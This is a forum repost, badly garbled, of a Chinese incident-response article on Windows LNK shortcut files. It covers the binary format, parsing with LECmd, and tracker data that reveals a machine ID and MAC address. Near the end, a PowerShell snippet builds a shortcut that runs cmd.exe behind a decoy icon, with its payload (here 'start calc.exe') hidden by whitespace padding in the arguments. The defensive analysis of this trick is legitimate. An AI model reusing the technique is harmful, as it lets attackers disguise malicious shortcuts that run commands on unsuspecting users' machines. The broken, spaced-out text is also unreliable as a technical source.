搜索

[18830] 2021-08-23_应急响应之Lnk文件分析

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2021-08-23_应急响应之Lnk文件分析 L n k     h u a s e c   2 0 2 1 - 0 8 - 2 3   #   , 2 6   L N K M i c r o s o f t W i n d o w s L N K L N K L i n k . l n k 使 L N K S h e l l   L i n k B i n a r y   ( L N K ) 0 1 S h e l l   L i n k   B i n a r y S h e l l   L i n k   B i n a r y 访 . L N K 访 S h e l l   l i n k   B i n a r y S H E L L _ L I N K _ H E A D E R L i n k F l a g s 使   L I N K T A R G E T _ I D L I S T   L i n k F l a g s   H a s L i n k T a r g e t I D L i s t L I N K T A R G E T _ I D L I S T L i n k F l a g s H a s L i n k T a r g e t I D L i s t L I N K T A R G E T _ I D L I S T C : t e s t 1 . t x t 使 W i n d o w s   S h e l l   N a m e S p a c e I S h e l l F o l d e r I t e m I D L i s t I D L i s t L i n k T a r g e t I d L i s t L i n k I n f o L i n k F l a g s H a s L i n k I n f o L i n k I n f o S t r i n g D a t a S t r i n g D a t a S h e l l L i n k H e a d e r L i n k F l a g s L i n k F l a g s H a s W o r k i n g D i r H a s R e l a t i v e P a t h H a s A r g u m e n t s E x t r a D a t a L n k E n v i r o n m e n t V a r i a b l e D a t a B l o c k L n k T r a c k e r D a t a B l o c k M a c h i n e I D ( N e t B I O S ) M A C
h t t p s : / / d o c s . m i c r o s o f t . c o m / z h - c n / o p e n s p e c s / w i n d o w s _ p r o t o c o l s / m s - s h l l i n k / 7 4 7 6 2 9 b 3 - b 5 b e - 4 5 2 a - 8 1 0 1 - b 9 a 2 e c 4 9 9 7 8 c 0 2 L E c m d h t t p s : / / g i t h u b . c o m / E r i c Z i m m e r m a n / L E C m d 使 T r a c k e r   d a t a b a s e   b l o c k   :     M a c h i n e   I D :   d e s k t o p - 0 u 9 o 9 2 5     M A C   A d d r e s s :   0 0 : 0 c : 2 9 : 0 d : 9 2 : 4 b     M A C   V e n d o r :   V M W A R E     C r e a t i o n :   2 0 2 1 - 0 1 - 2 8   0 3 : 2 8 : 5 5 L N K L N K L N K M A C 0 3 L n k 使 L n k L n k > L E C m d . e x e   - f " C : U s e r s P u b l i c D e s k t o p W i r e s h a r k . l n k " $ f i l e   =   G e t - C o n t e n t   " C : U s e r s a d m i n D e s k t o p t e s t . t x t " $ b l a n k _ s p a c e   =   '             ' $ W s h S h e l l   =   N e w - O b j e c t   - c o m O b j e c t   W S c r i p t . S h e l l
$ b l a n k _ s p a c e p a y l o a d C : U s e r s a d m i n D e s k t o p t e s t . t x t / c   s t a r t   c a l c . e x e t e s t . l n k 2 6 0 p a y l o a d p a y l o a d $ S h o r t c u t   =   $ W s h S h e l l . C r e a t e S h o r t c u t ( " C : U s e r s a d m i n D e s k t o p t e s t . l n k " ) $ S h o r t c u t . T a r g e t P a t h   =   " % S y s t e m R o o t % s y s t e m 3 2 c m d . e x e " $ S h o r t c u t . I c o n L o c a t i o n   =   " % S y s t e m R o o t % S y s t e m 3 2 S h e l l 3 2 . d l l , 2 2 " $ S h o r t c u t . A r g u m e n t s   =   $ b l a n k _ s p a c e   +   $ f i l e $ S h o r t c u t . S a v e ( )
t e s t . l n k p a y l o a d
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理